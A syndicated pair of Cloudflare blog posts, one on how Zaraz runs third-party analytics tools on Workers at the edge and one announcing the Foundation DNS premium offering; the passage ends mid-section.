We decided to create Zaraz around the end of March 2020. We were working on another product when we noticed everyone was asking us about the performance impact of having many third-parties on their website. Third-party content is an important part of the majority of websites today, powering analytics, chatbots, conversion pixels, widgets — you name it. The definition of third-party is an asset, often JavaScript, hosted outside the primary site-user relationship, that is not under the direct control of the site owner but is present with ‘approval’. Yair wrote in detail about the process of measuring the impact of these third-party tools, and how we pivoted our startup, but I wanted to write about how we built Zaraz and what it actually does behind the scenes.

Third parties are great in that they let you integrate already-made solutions with your website, and you barely need to do any coding. Analytics? Just drop this code snippet. Chat widget? Just add this one. Third-party vendors will usually instruct you on how to add their tool, and from that point on things should just be working. Right? But when you add third-party code, it usually fetches even more code from remote sources, meaning you have less and less control over whatever is happening in your visitors’ browsers. How can you guarantee that none of the multitude of third parties you have on your website has been hacked and started stealing information, mining cryptocurrencies, or logging key presses on your visitors’ computers?

It doesn’t even have to be a deliberate hack. As we investigated more and more third-party tools, we noticed a pattern — sometimes it’s easier for a third-party vendor to collect everything, rather than being selective or careful about it. More often than not, user emails would find their way into a third-party tool, which could very easily put the website owner in trouble due to GDPR, CCPA, or similar.

How third-party tools work today

Usually, when you add a third party to your page, you’re asked to add a piece of JavaScript code to the <head> of your HTML. Google Analytics is by far the most popular third-party, so let’s see how it’s done there:

<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->

In this case, and in most other cases, the snippet that you’re pasting actually calls more JavaScript code to be executed. The snippet above creates a new <script> element, gives it the https://www.google-analytics.com/analytics.js src attribute, and appends it to the DOM. The browser then loads the analytics.js script, which includes more JavaScript code than the snippet itself, and sometimes asks the browser to download even more scripts, some of them bigger than analytics.js itself. So far, however, no analytics data has been captured at all, although this is why you’ve added Google Analytics in the first place.

The last line in the snippet, ga('send', 'pageview');, uses a function defined in the analytics.js file to finally send the pageview. The function is needed because it is what captures the analytics data: it fetches the browser type, the screen resolution, the language, etc. Then it constructs a URL that includes all the data and sends a request to this URL. It’s only after this step that the analytics information gets captured. Every user behavior event you record using Google Analytics will result in another request.
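Stripped of details, the beacon such a call produces is just a GET request with the collected facts encoded into the query string. The sketch below is illustrative; the parameter names are simplified stand-ins, not the exact Measurement Protocol fields.

```python
from urllib.parse import urlencode

# Facts the client-side library gathers before beaconing (illustrative values)
params = {
    "tid": "UA-XXXXX-Y",               # the property ID from the snippet
    "t": "pageview",                   # hit type
    "dl": "https://www.example.com/",  # document location
    "sr": "1920x1080",                 # screen resolution
    "ul": "en-us",                     # user language
}
beacon_url = "https://www.google-analytics.com/collect?" + urlencode(params)
print(beacon_url)
```

Note how the document location ends up in the query string: this is exactly the path by which sensitive URLs, such as reset-password links, can leak to third parties.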

The reality is that the vast majority of tools consist of more than one resource file, and that it’s practically impossible to know in advance what a tool is going to load without testing it on your website. You can use Request Map Generator to get a visual representation of all the resources loaded on your website, including how they call each other. Below is a Request Map of a demo e-commerce website we created:

Zaraz use Workers to make third-party tools secure and fast

That big blue circle is our website’s resources, and all the other circles are third-party tools. You can see how the big green circle is actually a sub-request of the main Facebook pixel (fbevents.js), and how many tools, like LinkedIn in the top right, create a redirect chain in order to sync some data, at the expense of forcing the browser to make more and more network requests.

A new place to run a tag manager — the edge

Since we want to make third parties faster, more secure, and private, we had to develop a fundamentally new way of thinking about them and a new system for how they run. We came up with a plan: build a platform where third parties can run code outside the browser, while still getting access to the information they need and being able to talk with the DOM when necessary. We don’t believe third parties are evil: they never intended to slow down the Internet for everyone, they just didn’t have another option. Being able to run code on the edge and run it fast opened up new possibilities and changed all that, but the transition is hard.

By moving third-party code to run outside the browser, we get multiple wins.

  • The website will load faster and be more interactive. The browser rendering your website can now focus on the most important thing — your website. The downloading, parsing and execution of all the third-party scripts will no longer compete or even block the rendering and interactivity of your website.
  • Control over the data sent to third-parties. Third-party tools often automatically collect information from the page and from the browser to, for example, measure site behaviour/usage. In many cases, this information should stay private. For example, most tools collect the document.location, but we often see a “reset password” page including the user email in the URL, meaning emails are unknowingly being sent and saved by third-party providers, usually without consent. Moving the execution of the third parties to the edge means we have full visibility into what is being sent. This means we can provide alerts and filters in case tools are trying to collect Personally Identifiable Information or mask the private parts of the data before they reach third-party servers. This feature is currently not available on the public beta, but contact us if you want to start using it today.
  • By reducing the amount of code being executed in the browser and by scanning all code that is executed in it, we can continuously verify that the code hasn’t been tampered with and that it only does what it is intended to do. We are working to connect Zaraz with Cloudflare Page Shield to do this automatically.
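To make the data-filtering idea above concrete, here is a minimal sketch of how an email address could be masked in an outgoing URL before it reaches a third-party server. The helper name and regex here are illustrative, not Zaraz’s actual implementation:

```javascript
// Sketch: mask query-parameter values that look like email addresses
// before a collected URL is forwarded to a third-party endpoint.
// redactEmails and EMAIL_RE are illustrative names, not Zaraz internals.
const EMAIL_RE = /[\w.+-]+@[\w-]+\.[\w.-]+/;

function redactEmails(urlString) {
  const url = new URL(urlString);
  // copy the keys first so we can mutate the params while iterating safely
  for (const key of [...url.searchParams.keys()]) {
    if (EMAIL_RE.test(url.searchParams.get(key))) {
      url.searchParams.set(key, 'REDACTED');
    }
  }
  return url.toString();
}
```

A reset-password URL that carries the user’s email in a query parameter would then leave the edge with `email=REDACTED` instead.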

When you configure a third-party tool through a normal tag manager, a lot happens in your visitors’ browsers that is out of your control. The tag manager loads and then evaluates all trigger rules to decide which tools to load. It then usually appends the script tags of those tools to the DOM of the page, making the browser fetch and execute the scripts. These scripts come from untrusted or unknown origins, increasing the risk of malicious code execution in the browser. They can also block the browser from becoming interactive until they have finished executing. They are generally free to do whatever they want in the browser, but most commonly they collect some information and send it to an endpoint on the third-party server. With Zaraz, the browser does essentially none of that.
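For contrast, the browser-side flow described above can be reduced to a sketch like this (a generic illustration, not any particular tag manager’s code):

```javascript
// Sketch: what a traditional tag manager does in the visitor's browser.
// Trigger evaluation, script injection, fetching and execution all
// happen client-side, on the page's main thread.
function loadTools(tools, doc, path) {
  const injected = [];
  for (const tool of tools) {
    if (!tool.trigger(path)) continue; // trigger rules evaluated in the browser
    const script = doc.createElement('script');
    script.src = tool.src; // an untrusted third-party origin
    doc.head.appendChild(script); // the browser now fetches and executes it
    injected.push(tool.name);
  }
  return injected;
}
```

Every tool that matches a trigger adds another fetch-parse-execute cycle to the page load; moving this evaluation to the edge removes all of it from the browser.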

Zaraz uses Workers to make third-party tools secure and fast

Choosing Cloudflare Workers

When we set about coding Zaraz, we quickly understood that our infrastructure decisions would have a massive impact on our service. In fact, choosing the wrong one could mean we had no service at all. The most common alternative to Zaraz is traditional Tag Management software, which generally has no server-side component: whenever a user “publishes” a configuration, a JavaScript file is rendered and hosted as a static asset on a CDN. With Zaraz, the idea is to move most of the code evaluation out of the browser and respond with dynamically generated JavaScript each time. We needed to find a solution that would allow us to have a server-side component but be as fast as a CDN. Otherwise, there was a risk we might end up slowing down websites instead of making them faster.

We needed Zaraz to be served from a place close to the visiting user. Since setting up servers all around the world seemed like too big of a task for a very young startup, we looked at a few distributed serverless platforms. We approached this search with a small list of requirements:

  • Run JavaScript: Third-party tools all use JavaScript. If we were to port them to run in a cloud environment, the easiest way to do so would be to be able to use JavaScript as well.
  • Secure: We are processing sensitive data. We can’t afford the risk of someone hacking into our EC2 instance. We wanted to make sure that data doesn’t stay on some server after we send our HTTP response.
  • Fully programmable: Some CDNs allow setting complicated rules for handling a request, but altering HTTP headers, setting redirects or HTTP response codes isn’t enough. We need to generate JavaScript code on the fly, meaning we need full control over the responses. We also need to use some external JavaScript libraries.
  • Extremely fast and globally distributed: In the very early stages of the company, we already had customers in the USA, Europe, India, and Israel. As we were preparing to show them a Proof of Concept, we needed to be sure it would be fast wherever they were. We were competing with tag managers and Customer Data Platforms that have pretty fast response times, so we needed to respond as fast as if our content were statically hosted on a CDN, or faster.

Initially we thought we would need to create Docker containers that would run around the globe and would use their own HTTP server, but then a friend from our Y Combinator batch said we should check out Cloudflare Workers.

At first, we thought it wouldn’t work — Workers doesn’t work like a Node.js application, and we felt that limitation would prevent us from building what we wanted. We planned to let Workers handle the requests coming from users’ browsers, and then use an AWS Lambda for the heavy lifting of actually processing data and sending it to third-party vendors.

Our first attempt with Workers was very simple: just confirming we could use it to actually return dynamic browser-side JavaScript that is generated on-the-fly:

addEventListener('fetch', (event) => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  let code = '(function() {'

  // the User-Agent header can be absent, so fall back to an empty string
  const userAgent = request.headers.get('user-agent') || ''
  if (userAgent.includes('Firefox')) {
    code += `console.log('Hello Firefox!');`
  } else {
    code += `console.log('Hey other browsers...');`
  }

  code += '})();'

  return new Response(code, {
    headers: { 'content-type': 'text/javascript' }
  });
}

It was a tiny example, but I remember calling Yair afterwards and saying “this could actually work!” It proved the flexibility of Workers: we had just created an endpoint that served a dynamically generated JavaScript file, and the response time was less than 10ms. We could now put <script src="path/to/worker.js"> in our HTML and treat this Worker like a normal JavaScript file.

As we took a deeper look, we found Workers answering demand after demand from our list, and learned we could even do the most complicated things inside Workers. The Lambda function started doing less and less, and was eventually removed. Our little Node.js proof-of-concept was easily converted to Workers.

Using the Cloudflare Workers platform: “standing on the shoulders of giants”

When we raised our seed round, we heard many questions like “if this can work, how come it wasn’t built before?” We often said that while the problem is a long-standing one, accessible edge computing is a new possibility. Later, on our first investor update after creating the prototype, we told them about the unbelievably fast response times we had managed to achieve and got much praise for it — talk about “standing on the shoulders of giants”. Workers simply checked all our boxes.

Running JavaScript and using the same V8 engine as the browser meant that we could keep the same environment when porting tools to run on the cloud (it also helped with hiring). It also opened the possibility of later using WebAssembly for certain tasks. The fact that Workers are serverless and stateless by default was a selling point for our own trustworthiness: we told customers we couldn’t save their personal data even by mistake, which was true. The integration between webpack and Wrangler meant that we could write a full-blown application — with modules and external dependencies — and shift 100% of our logic into our Worker. And the performance helped us ace all our demos.

As we were building Zaraz, the Workers platform got more advanced. We ended up using Workers KV for storing user configuration, and Durable Objects for communicating between Workers. Our main Worker holds server-side implementations of more than 50 popular third-party tools, replacing hundreds of thousands of lines of JavaScript that traditionally run inside browsers. It’s an ever-growing list, and we recently also published an SDK that allows third-party vendors to build support for their tools themselves. For the first time, they can do it in a secure, private, and fast environment.

A new way to build third-parties

Most third-party tools do two fundamental things: first, they collect some information from the browser, such as screen resolution, current URL, page title or cookie content. Second, they send it to their server. This is often simple, but when a website has tens of these tools, and each of them queries for the information it needs and then sends its requests, it can cause a real slowdown. With Zaraz, this looks very different: every tool provides a run function, and when Zaraz evaluates the user request and decides to load a tool, it executes this run function. This is how we built integrations for over 50 different tools, all from different categories, and this is how we’re inviting third-party vendors to write their own integrations into Zaraz.

run({system, utils}) { 
  // The `system` object includes information about the current page, browser, and more 
  const { device, page, cookies } = system
  // The `utils` are a set of functions we found useful across multiple tools
  const { getCookieString, waitUntil } = utils

  // Get the existing cookie content, or create a new UUID instead
  const cookieName = 'visitor-identifier'
  const sessionCookie = cookies[cookieName] || crypto.randomUUID()

  // Build the payload
  const payload = {
    session: sessionCookie,
    ip: device.ip,
    resolution: device.resolution,
    ua: device.userAgent,
    url: page.url.href,
    title: page.title,
  }

  // Construct the URL
  const baseURL = 'https://example.com/collect?'
  const params = new URLSearchParams(payload)
  const finalURL = baseURL + params

  // Send a request to the third-party server from the edge
  waitUntil(fetch(finalURL))
  
  // Save or update the cookie in the browser
  return getCookieString(cookieName, sessionCookie)
}

The above code runs in our Cloudflare Worker, instead of the browser. Previously, having 10x more tools meant 10x more requests the browser rendering your website needed to make, and 10x more JavaScript code it needed to evaluate. This code would often be repetitive; for example, almost every tool implements its own “get cookie” function. It also meant 10x more origins you had to trust weren’t being tampered with. When tools run on the edge, none of this affects the browser: you can add as many tools as you want, but they won’t load in the browser, so they have no effect on its performance.

In this example, we first check for the existence of a cookie that identifies the session, called “visitor-identifier”. If it exists, we read its value; if not, we generate a new UUID for it. Note that the power of Workers is all accessible here: we use crypto.randomUUID() just like we can use any other Workers functionality. We then collect all the information our example tool needs — user agent, current URL, page title, screen resolution, client IP address — and the content of the “visitor-identifier” cookie. We construct the final URL that the Worker needs to send a request to, and we then use waitUntil to make sure the request gets there. Zaraz’s version of fetch gives our tools automatic logging, data loss prevention and retries capabilities.

Lastly, we return the value of the getCookieString function. Whatever string is returned by the run function is passed to the visitor as browser-side JavaScript. In this case, getCookieString returns something like document.cookie = 'visitor-identifier=5006e6fa-7ce6-45ef-8724-c846f1953369; Path=/; Max-age=31536000';, causing the browser to create a first-party cookie. The next time a user loads a page, the visitor-identifier cookie should exist, causing Zaraz to reuse the UUID instead of creating a new one.
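A minimal version of such a helper could look like this (an illustrative sketch; the real Zaraz utility handles more cookie attributes):

```javascript
// Sketch: build the browser-side statement that persists a first-party
// cookie, matching the behavior of getCookieString described above.
function getCookieString(name, value, maxAgeSeconds = 31536000) {
  return `document.cookie = '${name}=${value}; Path=/; Max-age=${maxAgeSeconds}';`;
}
```

The returned string is shipped to the browser as ordinary JavaScript, so the cookie is set under the site’s own domain: a first-party cookie, created by code that ran on the edge.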

This system of run functions allows us to separate and isolate each tool to run independently of the rest of the system, while still providing it with all the required context and data coming from the browser, and the capabilities of Workers. We are inviting third-party vendors to work with us to build the future of secure, private and fast third-party tools.

A new events system

Many third-party tools need to collect behavioral information during a user visit. For example, you might want to place a conversion pixel right after a user clicks “submit” on the credit card form. Since we moved tools to the cloud, you can’t access their libraries from the browser context anymore. For that we created zaraz.track() — a method that allows you to call tools programmatically, and optionally provide them with more information:

document.getElementById("credit-card-form").addEventListener("submit", () => {
  zaraz.track("card-submission", {
    value: document.getElementById("total").innerHTML,
    transaction: "X-98765",
  });
});

In this example, we’re letting Zaraz know about a trigger called “card-submission”, and we associate some data with it — the value of the transaction, which we take from an element with the ID total, and a transaction code that is hardcoded and printed directly from our backend.

In the Zaraz interface, configured tools can be subscribed to different and multiple triggers. When the code above gets triggered, Zaraz checks, on the edge, what tools are subscribed to the card-submission trigger, and it then calls them with the right additional data supplied, populating their requests with the transaction code and its value.
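Conceptually, that edge-side dispatch could be sketched like this (a simplification; the real matching logic is more involved):

```javascript
// Sketch: match a zaraz.track() event arriving at the edge against the
// tools subscribed to its trigger, and run each matching tool there.
async function dispatchTrigger(triggerName, eventData, toolConfigs) {
  const results = [];
  for (const tool of toolConfigs) {
    if (!tool.triggers.includes(triggerName)) continue;
    // the tool's run function executes on the edge, never in the browser
    results.push(await tool.run({ trigger: triggerName, ...eventData }));
  }
  return results;
}
```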

This is different from how traditional tag managers work: GTM’s dataLayer.push serves a similar purpose, but is evaluated client-side. The result is that GTM itself, when used intensively, grows its script so much that it can become the heaviest tool a website loads. Each event sent using dataLayer.push causes repeated evaluation of code in the browser, and each tool that matches the evaluation executes code in the browser, possibly calling more external assets. As these events are usually coupled with user interactions, this often makes interacting with a website feel slow, because running the tools occupies the main thread. With Zaraz, these tools exist and are evaluated only at the edge, improving the website’s speed and security.


You don’t have to be a coder to use triggers. The Zaraz dashboard allows you to choose from a predefined set of templates, like click listeners, scroll events and more, that you can attach to any element on your website without touching your code. When you combine zaraz.track() with the ability to program your own tools, what you get is essentially a one-line integration of Workers into your website. You can write any backend code you want and Zaraz will take care of calling it at exactly the right time with the right parameters.

Joining Cloudflare

When new customers started using Zaraz, we noticed a pattern: the best teams we worked with chose Cloudflare, and some were also moving parts of their backend infrastructure to Workers. We figured we could further improve performance and integration for companies using Cloudflare as well. We could inline parts of the code inside the page and further reduce the number of network requests. Integration also allowed us to remove the time it takes to resolve our script’s DNS, because we could use Workers to proxy Zaraz onto our customers’ domains. Integrating with Cloudflare made our offering even more compelling.

Back when we were doing Y Combinator in Winter 2020 and realized how much third parties could affect a website’s performance, we saw a grand mission ahead of us: creating a faster, more private, and secure web by reducing the amount of third-party bloat. This mission remains the same to this day. As our conversations with Cloudflare got deeper, we were excited to realize that we were talking with people who share the same vision. We are thrilled for the opportunity to scale our solutions to millions of websites on the Internet, making them faster and safer and even reducing carbon emissions.

If you would like to explore the free beta version, please click here. If you are an enterprise and have additional/custom requirements, please click here to join the waitlist. To join our Discord channel, click here.

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

Post Syndicated from Hannes Gerhart original https://blog.cloudflare.com/foundation-dns/

Announcing Foundation DNS — Cloudflare’s new premium DNS offering


Today, we’re announcing Foundation DNS, Cloudflare’s new premium DNS offering that provides unparalleled reliability, supreme performance and is able to meet the most complex requirements of infrastructure teams.

Let’s talk money first

When you’re signing an enterprise DNS deal, usually DNS providers request three inputs from you in order to generate a quote:

  • Number of zones
  • Total DNS queries per month
  • Total DNS records across all zones

Some are considerably more complicated, and many have pricing calculators or opaque “Contact Us” pricing. Planning a budget around how you may grow adds unnecessary complexity, and we think we can do better. Why not make this even simpler? Here you go: we decided to charge Foundation DNS based on a single input for our enterprise customers: total DNS queries per month. This way, we expect to save companies money and, even more importantly, remove complexity from their DNS bill.

And don’t worry, just like the rest of our products, DDoS mitigation is still unmetered. There won’t be any hidden overage fees in case your nameservers are DDoS’d or the number of DNS queries exceeds your quota for a month or two.

Why is DNS so important?


The Domain Name System (DNS) is nearly as old as the Internet itself. It was originally defined in RFC 882 and RFC 883 in 1983, out of the need to create a mapping between hostnames and IP addresses. Back then, the authors wisely stated: “[The Internet] is a large system and is likely to grow much larger.” [RFC882]. Today there are almost 160 million domain names under .com alone, one of the largest top-level domains (TLDs) [source].

By design, DNS is a hierarchical and highly distributed system, but as an end user you usually only communicate with a resolver (1) that is either assigned or operated by your Internet Service Provider (ISP), or directly configured by your employer or yourself. The resolver communicates with one of the root servers (2), the responsible TLD server (3), and the authoritative nameserver (4) of the domain in question. In many cases, all four of these parties are operated by different entities and located in different regions, maybe even continents.
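The four-party lookup described above can be modeled as plain data (a didactic sketch; real resolvers cache heavily and often skip hops):

```javascript
// Sketch: the chain of servers involved in resolving a hostname,
// numbered as in the description above.
function resolveChain(hostname) {
  const tld = hostname.split('.').pop();
  return [
    { step: 1, server: 'recursive resolver', role: `receives the query for ${hostname}` },
    { step: 2, server: 'root server', role: `refers the resolver to the .${tld} TLD servers` },
    { step: 3, server: `.${tld} TLD server`, role: 'refers the resolver to the authoritative nameservers' },
    { step: 4, server: 'authoritative nameserver', role: `answers with the records for ${hostname}` },
  ];
}
```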


As we have seen in the recent past, if your DNS infrastructure goes down, you are in serious trouble: it will likely cost you a lot of money and potentially damage your reputation. So as a domain owner, you want DNS lookups for your domain to be answered 100% of the time, and ideally as quickly as possible. So what can you do? You cannot influence which resolver your users have configured. You cannot influence the root server. You can choose which TLD server is involved by picking a domain name with the respective TLD, but if you are bound to a certain TLD for other reasons, that is out of your control as well. What you can easily influence is the provider for your authoritative nameservers. So let’s take a closer look at Cloudflare’s authoritative DNS offering.

A look at Cloudflare’s Authoritative DNS

Authoritative DNS is one of our oldest products, and we have spent a lot of time making it great. All DNS queries are answered from our global anycast network with a presence in more than 250 cities. This way, we can deliver supreme performance while always guaranteeing global availability. And of course, we leverage our extensive experience in mitigating DDoS attacks to prevent anyone from knocking down our nameservers and, with them, the domains of our customers.

DNS is critically important to Cloudflare because, up until the release of Magic Transit, DNS was how every user on the Internet was directed to Cloudflare to protect and accelerate our customers’ applications. If our DNS answers were slow, Cloudflare was slow. If our DNS answers were unavailable, Cloudflare was unavailable. The speed and reliability of our authoritative DNS is paramount to the speed and reliability of Cloudflare, as it is to our customers. We have also had our customers push our DNS infrastructure as they’ve grown with Cloudflare. Today our largest customer zone has more than 3 million records, and the top 5 reach almost 10 million records combined. Those customers rely on Cloudflare to push new DNS record updates to our edge in seconds, not minutes. Because of this importance and our customers’ needs, over the years we have grown a dedicated DNS engineering team focused on keeping our DNS stack fast and reliable.

The security of the DNS ecosystem is also important. Cloudflare has always been a proponent of DNSSEC. Signing and validating DNS answers through DNSSEC ensures that an on-path attacker cannot hijack answers and redirect traffic. Cloudflare has always offered DNSSEC for free on all plan levels, and it will continue to be a no charge option for Foundation DNS. For customers who also choose to use Cloudflare as a registrar, simple one-click deployment of DNSSEC is another key feature that ensures our customers’ domains are not hijacked, and their users are protected. We support RFC 8078 for one-click deployment on external registrars as well.

But there are other issues that can bring parts of the Internet to a halt, and these are mostly out of our control: route leaks or, even worse, route hijacks. While DNSSEC can help mitigate route hijacks, unfortunately not all recursive resolvers validate DNSSEC. And even if the resolver does validate, a route leak or hijack of your nameservers will still result in downtime. If all your nameserver IPs are affected by such an event, your domain becomes unresolvable.

With many providers, each of your nameservers usually resolves to only one IPv4 and one IPv6 address. If that IP address is not reachable — for example, because of network congestion or, even worse, a route leak — the entire nameserver becomes unavailable, leaving your domain unresolvable. Worse still, some providers use the same IP subnet for all their nameservers, so if there is an issue with that subnet, all nameservers are down.

Let’s take a look at an example:

$ dig aws.com ns +short              
ns-1500.awsdns-59.org.
ns-164.awsdns-20.com.
ns-2028.awsdns-61.co.uk.
ns-917.awsdns-50.net.

$ dig ns-1500.awsdns-59.org. +short
205.251.197.220
$ dig ns-164.awsdns-20.com. +short
205.251.192.164
$ dig ns-2028.awsdns-61.co.uk. +short
205.251.199.236
$ dig ns-917.awsdns-50.net. +short
205.251.195.149

All nameserver IPs are part of 205.251.192.0/21. Thankfully, AWS is now signing their ranges through RPKI and this makes it less likely to leak… provided that the resolver ISP is validating RPKI. But if the resolver ISP does not validate RPKI and should this subnet be leaked or hijacked, resolvers wouldn’t be able to reach any of the nameservers and aws.com would become unresolvable.

It goes without saying that Cloudflare signs all of our routes and is pushing the rest of the Internet to minimize the impact of route leaks, but what else can we do to ensure that our DNS systems remain resilient through route leaks while we wait for RPKI to be ubiquitously deployed?

Today, when you’re using Cloudflare DNS on the Free, Pro, Business or Enterprise plan, your domain gets two nameservers of the structure <name>.ns.cloudflare.com where <name> is a random first name.

$ dig isbgpsafeyet.com ns +short
tom.ns.cloudflare.com.
kami.ns.cloudflare.com.

Now, as we learned before, in order for a domain to be available, its nameservers have to be available. This is why each of these nameservers resolves to 3 anycast IPv4 and 3 anycast IPv6 addresses.

$ dig tom.ns.cloudflare.com a +short
173.245.59.147
108.162.193.147
172.64.33.147

$ dig tom.ns.cloudflare.com aaaa +short
2606:4700:58::adf5:3b93
2803:f800:50::6ca2:c193
2a06:98c1:50::ac40:2193

The essential detail to notice here is that each of the 3 IPv4 and 3 IPv6 addresses is from a different /8 IPv4 (/45 for IPv6) block. So in order for your nameservers to become unavailable via IPv4, a route leak would have to affect exactly the corresponding subnets across all three /8 IPv4 blocks. This type of event, while theoretically possible, is virtually impossible in practice.
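You can check the claim directly: the three IPv4 addresses returned above all start with different first octets, so each lives in a different /8, while every nameserver in the earlier aws.com example shares 205/8.

```javascript
// Verify that a set of nameserver IPv4 addresses spans distinct /8 blocks,
// using the anycast addresses shown in the dig output above.
function spansDistinctSlash8(ips) {
  const firstOctets = ips.map((ip) => ip.split('.')[0]);
  return new Set(firstOctets).size === ips.length;
}

const cloudflareNS = ['173.245.59.147', '108.162.193.147', '172.64.33.147'];
const awsNS = ['205.251.197.220', '205.251.192.164', '205.251.199.236', '205.251.195.149'];
// cloudflareNS spans three different /8s (173/8, 108/8, 172/8);
// all awsNS addresses sit in 205/8
```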

How can this be further improved?

Customers using Foundation DNS will be assigned a new set of advanced nameservers hosted on foundationdns.com and foundationdns.net. These nameservers will be even more resilient than the default Cloudflare nameservers. We will be announcing more details about how we’re achieving this early next year, so stay tuned. All external Cloudflare domains (such as cloudflare.com) will transition to these nameservers in the new year.

There is even more

We’re glad to announce that we are launching two highly requested features:

  • Support for outgoing zone transfers for Secondary DNS
  • Logpush for authoritative and secondary DNS queries

Both of them will be available as part of Foundation DNS, and to enterprise customers, without any additional cost. Let’s take a closer look at each of these and see how they make our DNS offering even better.

Support for outgoing zone transfers for Secondary DNS

What is Secondary DNS, and why is it important? Many large enterprises are required to use more than one DNS provider for redundancy, in case one provider becomes unavailable. They can achieve this by adding their domain’s DNS records on two independent platforms and manually keeping the zone files in sync — this is referred to as a “multi-primary” setup. With Secondary DNS, there are two mechanisms to automate this using a “primary-secondary” setup:

  • DNS NOTIFY: The primary nameserver notifies the secondary on every change to the zone. Once the secondary receives the NOTIFY, it sends a zone transfer request to the primary to get in sync.
  • SOA query: The secondary nameserver regularly queries the SOA record of the zone and checks whether the serial number found there matches the latest serial number the secondary has stored in its own copy of the SOA record. If a new version of the zone is available, it sends a zone transfer request to the primary to pick up those changes.
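The SOA check above comes down to a serial-number comparison. Here is a sketch using RFC 1982 serial arithmetic, which handles the 32-bit counter wrapping around:

```javascript
// RFC 1982 serial-number arithmetic: s1 < s2 when the forward distance
// from s1 to s2, modulo 2^32, is non-zero and below 2^31.
const SERIAL_SPACE = 2 ** 32;

function serialLessThan(s1, s2) {
  const distance = (s2 - s1 + SERIAL_SPACE) % SERIAL_SPACE;
  return distance > 0 && distance < 2 ** 31;
}

// A secondary requests a zone transfer when the primary's serial is newer.
function needsZoneTransfer(storedSerial, primarySerial) {
  return serialLessThan(storedSerial, primarySerial);
}
```

The modular comparison is what lets a zone keep working even when its serial counter rolls over from 4294967295 back to 0.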

Alex Fattouche has written a very insightful blog post about how Secondary DNS works behind the scenes, if you want to learn more. Another flavor of the primary-secondary setup is to hide the primary, referred to as a “hidden primary” setup. The difference here is that only the secondary nameservers are authoritative — in other words, only they are configured at the domain’s registrar. The diagram below illustrates the different setups.


Since 2018, we have been supporting primary-secondary setups where Cloudflare takes the role of the secondary nameserver. This means from our perspective that we are accepting incoming zone transfers from the primary nameservers.


Starting today, we also support outgoing zone transfers, meaning Cloudflare takes the role of the primary nameserver, with one or multiple external secondary nameservers receiving zone transfers from Cloudflare. Exactly as for incoming transfers, we support:

  • zone transfers via AXFR and IXFR
  • automatic notifications via DNS NOTIFY to trigger zone transfers on every change
  • signed transfers using TSIG to ensure zone files are authenticated during transfer

Logpush for authoritative and secondary DNS

Here at Cloudflare we love logs. In Q3 2021, we processed 28 million HTTP requests per second and 13.6 million DNS queries per second on average, and blocked 76 billion threats each day. All these events are stored as logs for a limited time frame in order to provide our users near real-time analytics in the dashboard. For those customers who want to — or have to — permanently store these logs, we built Logpush back in 2019. Logpush allows you to stream logs in near real time to one of our analytics partners (Microsoft Azure Sentinel, Splunk, Datadog and Sumo Logic) or to any cloud storage destination with an S3-compatible API.


Today, we’re adding one additional data set for Logpush: DNS logs. In order to configure Logpush and stream DNS logs for your domain, just head over to the Cloudflare dashboard, create a new Logpush job, select DNS logs and configure the log fields you’re interested in:


Check out our developer documentation for detailed instructions on how to do this through the API and for a thorough description of the new DNS log fields.
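As a rough sketch, a Logpush job for the new dataset takes a payload shaped roughly like the one below. The field names (`dataset`, `destination_conf`, `logpull_options`) follow the Logpush API as we understand it at the time of writing, and the listed log fields are examples rather than a complete list; treat the developer documentation as the authoritative schema:

```javascript
// Sketch: the request body for creating a Logpush job that streams DNS
// logs. Field and dataset names are assumptions based on the Logpush API
// docs; the log fields shown are illustrative examples.
function buildDnsLogpushJob({ name, destination }) {
  return {
    name,
    dataset: 'dns_logs',
    destination_conf: destination, // e.g. an object-storage bucket URL
    logpull_options: 'fields=QueryName,QueryType,ResponseCode,SourceIP&timestamps=rfc3339',
  };
}
```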

One more thing (or two…)

When looking at the entirety of DNS within your infrastructure, it’s important to review how traffic flows through your systems and how it behaves. At the end of the day, there is only so much processing power, memory, server capacity, and overall compute available. One of the best and most important tools we have for this is Load Balancing with Health Monitoring!

Cloudflare has provided a Load Balancing solution since 2016, helping customers leverage their existing resources in a scalable and intelligent manner. But our Load Balancer was limited to A, AAAA, and CNAME records. This covered many major use cases, but not all of them. Many customers have further needs: load balancing MX (email server) traffic, SRV records to declare the port and weight for a specific service’s traffic, HTTPS records to ensure traffic uses the secure protocol regardless of port, and more. We want to ensure that our customers’ needs are covered and support their ability to align business goals with technical implementation.

We are happy to announce that we have added additional Health Monitoring methods to support Load Balancing MX, SRV, HTTPS and TXT record traffic without any additional configuration necessary. Create your respective DNS records in Cloudflare and set your Load Balancer as the destination…it’s as easy as that! By leveraging ICMP Ping, SMTP, and UDP-ICMP methods, customers will always have a pulse on the health of their servers and be able to apply intelligent steering decisions based on the respective health information.

When thinking about intelligent steering, there is no one-size-fits-all answer. Different businesses have different needs, especially when looking at where your servers are located around the globe and where your customers are situated. A common rule of thumb is to place servers where your customers are. This ensures they have the most performant and localized experience possible. One common scenario is to steer traffic based on where the end-user request originates, and create a mapping to the server closest to that area. Cloudflare’s geo steering capability allows our customers to do just that — easily create a mapping of regions to pools, ensuring that a request originating in Eastern Europe, for example, is sent to the proper server. But sometimes regions can be quite large, which prevents that mapping from being as tightly coupled as one might like.

Today, we are very excited to announce country support within our Geo Steering functionality. Customers will now be able to choose either one of our thirteen regions or a specific country to map against their pools, giving further granularity and control over how their traffic behaves as it travels through their systems. Both country-level steering and the new health monitoring methods that support load balancing more DNS record types will be available in January 2022!

Advancing the DNS Ecosystem

Furthermore, we have some other exciting news to share: we’re finishing work on Multi-Signer DNSSEC (RFC 8901) and plan to roll it out in Q1 2022. Why is this important? Two common requirements of large enterprises are:

  • Redundancy: Having multiple DNS providers responding authoritatively for their domains
  • Authenticity: Deploying DNSSEC to ensure DNS responses can be properly authenticated

